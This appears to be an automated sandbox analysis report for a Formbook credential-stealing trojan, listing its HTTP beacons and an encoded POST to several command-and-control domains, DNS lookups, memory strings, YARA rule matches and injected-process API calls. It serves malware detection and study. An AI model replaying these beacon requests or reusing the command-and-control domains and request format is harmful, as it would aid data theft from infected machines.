            Source: global trafficHTTP traffic detected: GET /r1bk/?H0kxIVc=yDxWd0BQEE2xW+d30AjHvTjkfNCptZ8W4Q8iivRSkmBvD/jrOo7hTp1c5kyDuCDLc7U+VDeOvWVRbtchKio2461hrTCe68AibWCqyGiIKQvuKq+py71Z7uY=&Ot=J0UP4Hshc HTTP/1.1Host: www.it2sp8.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
            Source: global trafficHTTP traffic detected: GET /5lco/?H0kxIVc=CvWen2QyFQx61qXZcJ6WaNLV8x6X7ZVzg6r8Qqi7af+RkACh3mo/Ys7mcuj5lMFPExxzGnawwjipItEZ43N8KIbGnzAFfsAX8PL843K3MC6R2n7AiDX71Bw=&Ot=J0UP4Hshc HTTP/1.1Host: www.bandukchi.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
            Source: global trafficHTTP traffic detected: GET /qmow/?H0kxIVc=na0KCebXsUeEcQbjI8C3RJS2SBGfuD1cmXaEpqyofp4hZXm4YCiWGFly0HVDOhs56sJdVgPDJehM8FklOw5CghWrF+7Yka4QOwdp8ykVOcUPZunN9V/VPgg=&Ot=J0UP4Hshc HTTP/1.1Host: www.onlineblikje.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
            Source: global trafficHTTP traffic detected: GET /4oy8/?H0kxIVc=eJmBD13k64JHFxSWOYO7bSQNXUvra9CcpSnvMZyv8GXgjYS7iGOJ4r3qlOLMHwm47b7Urtwu+Ud8lkmMYJJLw7a1N+npSrnw+8NLQJnsUuGONqGxi2BbLT4=&Ot=J0UP4Hshc HTTP/1.1Host: www.ninesquare.gamesAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
            Source: global trafficHTTP traffic detected: GET /bawd/?Ot=J0UP4Hshc&H0kxIVc=u5Voz89uvsTT2ra5JGRdo2CoktUkYzD5T2fkk0TxGbdhObJgjC1dgKFtYssbe+sKkN5ypiW+hntvof+b3woUZtrmCzyplN8wJfaiWaIfZPgKl3YVjiCvOuw= HTTP/1.1Host: www.s9gzg9.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
            Source: global trafficHTTP traffic detected: GET /l9k5/?H0kxIVc=H7cQmPt9JKqTBSlTYALj3uL313cqwSgrpOv4Qk+KWtYmd0Jzyglo5RxLzde7ABUUHrDY6BWuihw46hFGdejdjXkFASgi7f2oXUpHkyzL6FMNfiZrHYO4gE8=&Ot=J0UP4Hshc HTTP/1.1Host: www.030002832.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
            Source: global trafficHTTP traffic detected: GET /y4rz/?H0kxIVc=xriQ2m9IoSX/ZoqlWfOVIBJe8W/8vJ5niPS32xN8MNumdhR7vqoy4sIK639fnDEnN3UXIMGdxg/r6m8kDokIxA6VYynAvS6SL+DIBN0UUOY3N4LB1E/wQc0=&Ot=J0UP4Hshc HTTP/1.1Host: www.meliorahomes.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
            Source: global trafficHTTP traffic detected: GET /mszq/?H0kxIVc=qzVn//GB+4OjafG5GgjKg0F9R431hw5vq1LA9tKLMIDmfofusT37PFzci/hE67mKwrwsGFZ3ShgwJaTX+jeHs9Yuswh/Qy8vjFWcpY9xjOhcfqEzjvtiqBI=&Ot=J0UP4Hshc HTTP/1.1Host: www.bdipjg.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
            Source: global trafficHTTP traffic detected: GET /sm4f/?Ot=J0UP4Hshc&H0kxIVc=EaEMrXPp8wHqWJVBhtHqF3+v/VQY0/i9nv6TiqWBPFHSbs8QlWt2xVXVrkxIfcrF7TYepETuHZ89BYJlBcojqP6ggOEAyvBHZWGMGsHph5U7SQ47QEw+uXM= HTTP/1.1Host: www.sortcy.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
            Source: global trafficDNS traffic detected: DNS query: www.it2sp8.vip
            Source: global trafficDNS traffic detected: DNS query: www.bandukchi.com
            Source: global trafficDNS traffic detected: DNS query: www.onlineblikje.online
            Source: global trafficDNS traffic detected: DNS query: www.ninesquare.games
            Source: global trafficDNS traffic detected: DNS query: www.s9gzg9.vip
            Source: global trafficDNS traffic detected: DNS query: www.030002832.xyz
            Source: global trafficDNS traffic detected: DNS query: www.meliorahomes.net
            Source: global trafficDNS traffic detected: DNS query: www.bdipjg.asia
            Source: global trafficDNS traffic detected: DNS query: www.sortcy.top
            Source: global trafficDNS traffic detected: DNS query: www.bearableguy.net
            Source: unknownHTTP traffic detected: POST /5lco/ HTTP/1.1Host: www.bandukchi.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-USOrigin: http://www.bandukchi.comReferer: http://www.bandukchi.com/5lco/Cache-Control: max-age=0Content-Length: 204Content-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Data Ascii: H0kxIVc=Pt++kAhBCTpQyveFcKiyW8f610b0oqdMkZnUYun+cuWkyyXZ7R9vbcD9furN+p9xADthCyG34F2BLoAziiJ4Qp35nBgVT5MG+8S68GKDLyW03lj43wrM+R1evk8QG6DL3d6Aa7v6+jJQ5ISozdv8zYWwFta/LiKDkaotL0OC8UvBrtRQHvNn6MaHfXetefW25Q==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 14:43:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 14:43:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 14:43:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 14:43:58 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:44:04 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y4rz/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:44:07 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y4rz/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:44:10 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y4rz/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:44:12 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y4rz/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:44:33 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:44:36 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:44:38 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:44:41 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/html; charset=utf-8
            Source: SwTeWVAxKdsP.exe, 00000007.00000002.3528921594.0000000004C4E000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.bearableguy.net
            Source: SwTeWVAxKdsP.exe, 00000007.00000002.3528921594.0000000004C4E000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.bearableguy.net/m3fv/
            Source: dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: dvdplay.exe, 00000003.00000002.3526191845.000000000311C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: dvdplay.exe, 00000003.00000002.3526191845.000000000311C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: dvdplay.exe, 00000003.00000002.3526191845.000000000311C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: dvdplay.exe, 00000003.00000002.3526191845.000000000311C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033B
            Source: dvdplay.exe, 00000003.00000002.3526191845.000000000311C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: dvdplay.exe, 00000003.00000002.3526191845.000000000311C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: dvdplay.exe, 00000003.00000003.2051404955.0000000007D4A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: dvdplay.exe, 00000003.00000002.3527827023.0000000004298000.00000004.10000000.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000007.00000002.3527233426.0000000002EC8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://onlineblikjes.nl/?H0kxIVc=na0KCebXsUeEcQbjI8C3RJS2SBGfuD1cmXaEpqyofp4hZXm4YCiWGFly0HVDOhs56s
            Source: dvdplay.exe, 00000003.00000002.3527827023.0000000004A72000.00000004.10000000.00040000.00000000.sdmp, SwTeWVAxKdsP.exe, 00000007.00000002.3527233426.00000000036A2000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.bdipjg.asia/mszq/?H0kxIVc=qzVn//GB
            Source: dvdplay.exe, 00000003.00000002.3529782720.0000000007D6B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 0_2_0045A10F
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard | 0_2_0046DC80
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput | 0_2_0044C37A
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exe | Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW | 0_2_0047C81C

            E-Banking Fraud

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000003.00000002.3525954237.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1863259155.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.3527070490.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.3527139921.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.3527390754.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1863781996.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1862646981.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.3528921594.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3525954237.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1863259155.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3527070490.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3527139921.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.3527390754.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1863781996.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1862646981.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3528921594.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042C753 NtClose | 1_2_0042C753
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472B60 NtClose,LdrInitializeThunk | 1_2_03472B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk | 1_2_03472DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk | 1_2_03472C70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034735C0 NtCreateMutant,LdrInitializeThunk | 1_2_034735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03474340 NtSetContextThread | 1_2_03474340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03474650 NtSuspendThread | 1_2_03474650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472BE0 NtQueryValueKey | 1_2_03472BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472BF0 NtAllocateVirtualMemory | 1_2_03472BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472B80 NtQueryInformationFile | 1_2_03472B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472BA0 NtEnumerateValueKey | 1_2_03472BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472AD0 NtReadFile | 1_2_03472AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472AF0 NtWriteFile | 1_2_03472AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472AB0 NtWaitForSingleObject | 1_2_03472AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472F60 NtCreateProcessEx | 1_2_03472F60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472F30 NtCreateSection | 1_2_03472F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472FE0 NtCreateFile | 1_2_03472FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472F90 NtProtectVirtualMemory | 1_2_03472F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472FA0 NtQuerySection | 1_2_03472FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472FB0 NtResumeThread | 1_2_03472FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472E30 NtWriteVirtualMemory | 1_2_03472E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472EE0 NtQueueApcThread | 1_2_03472EE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472E80 NtReadVirtualMemory | 1_2_03472E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472EA0 NtAdjustPrivilegesToken | 1_2_03472EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472D00 NtSetInformationFile | 1_2_03472D00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472D10 NtMapViewOfSection | 1_2_03472D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472D30 NtUnmapViewOfSection | 1_2_03472D30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472DD0 NtDelayExecution | 1_2_03472DD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472DB0 NtEnumerateKey | 1_2_03472DB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472C60 NtCreateKey | 1_2_03472C60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472C00 NtQueryInformationProcess | 1_2_03472C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472CC0 NtQueryVirtualMemory | 1_2_03472CC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472CF0 NtOpenProcess | 1_2_03472CF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03472CA0 NtQueryInformationToken | 1_2_03472CA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03473010 NtOpenDirectoryObject | 1_2_03473010
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03473090 NtSetValueKey | 1_2_03473090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034739B0 NtGetContextThread | 1_2_034739B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03473D70 NtOpenThread | 1_2_03473D70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03473D10 NtOpenProcessToken | 1_2_03473D10
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D4340 NtSetContextThread,LdrInitializeThunk | 3_2_035D4340
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D4650 NtSuspendThread,LdrInitializeThunk | 3_2_035D4650
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2B60 NtClose,LdrInitializeThunk | 3_2_035D2B60
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk | 3_2_035D2BF0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2BE0 NtQueryValueKey,LdrInitializeThunk | 3_2_035D2BE0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2BA0 NtEnumerateValueKey,LdrInitializeThunk | 3_2_035D2BA0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2AD0 NtReadFile,LdrInitializeThunk | 3_2_035D2AD0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2AF0 NtWriteFile,LdrInitializeThunk | 3_2_035D2AF0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2F30 NtCreateSection,LdrInitializeThunk | 3_2_035D2F30
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2FE0 NtCreateFile,LdrInitializeThunk | 3_2_035D2FE0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2FB0 NtResumeThread,LdrInitializeThunk | 3_2_035D2FB0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2EE0 NtQueueApcThread,LdrInitializeThunk | 3_2_035D2EE0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2E80 NtReadVirtualMemory,LdrInitializeThunk | 3_2_035D2E80
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2D10 NtMapViewOfSection,LdrInitializeThunk | 3_2_035D2D10
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2D30 NtUnmapViewOfSection,LdrInitializeThunk | 3_2_035D2D30
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2DD0 NtDelayExecution,LdrInitializeThunk | 3_2_035D2DD0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2DF0 NtQuerySystemInformation,LdrInitializeThunk | 3_2_035D2DF0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2C70 NtFreeVirtualMemory,LdrInitializeThunk | 3_2_035D2C70
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2C60 NtCreateKey,LdrInitializeThunk | 3_2_035D2C60
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2CA0 NtQueryInformationToken,LdrInitializeThunk | 3_2_035D2CA0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D35C0 NtCreateMutant,LdrInitializeThunk | 3_2_035D35C0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D39B0 NtGetContextThread,LdrInitializeThunk | 3_2_035D39B0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2B80 NtQueryInformationFile | 3_2_035D2B80
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2AB0 NtWaitForSingleObject | 3_2_035D2AB0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2F60 NtCreateProcessEx | 3_2_035D2F60
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2F90 NtProtectVirtualMemory | 3_2_035D2F90
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2FA0 NtQuerySection | 3_2_035D2FA0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2E30 NtWriteVirtualMemory | 3_2_035D2E30
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2EA0 NtAdjustPrivilegesToken | 3_2_035D2EA0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2D00 NtSetInformationFile | 3_2_035D2D00
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2DB0 NtEnumerateKey | 3_2_035D2DB0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2C00 NtQueryInformationProcess | 3_2_035D2C00
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2CC0 NtQueryVirtualMemory | 3_2_035D2CC0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D2CF0 NtOpenProcess | 3_2_035D2CF0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D3010 NtOpenDirectoryObject | 3_2_035D3010
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D3090 NtSetValueKey | 3_2_035D3090
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D3D70 NtOpenThread | 3_2_035D3D70
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_035D3D10 NtOpenProcessToken | 3_2_035D3D10
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_00B490C0 NtCreateFile | 3_2_00B490C0
            Source: C:\Windows\SysWOW64\dvdplay.exe | Code function: 3_2_00B49230 NtReadFile | 3_2_00B49230
